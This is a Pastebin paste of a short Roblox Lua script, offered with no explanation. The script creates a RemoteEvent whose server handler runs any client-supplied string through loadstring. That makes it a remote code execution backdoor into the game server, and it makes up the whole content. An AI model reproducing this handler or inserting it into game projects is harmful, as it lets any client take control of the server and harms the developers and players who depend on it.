Advertisement
yougotoof

et

Dec 31st, 2018
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.18 KB | None | 0 0
  1. Event = Instance.new("RemoteEvent", game.ReplicatedStorage) -- This creates the remote
  2.  
  3. Event.OnServerEvent:connect(function(player, serverExecution)
  4. loadstring(serverExecution)()
  5. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement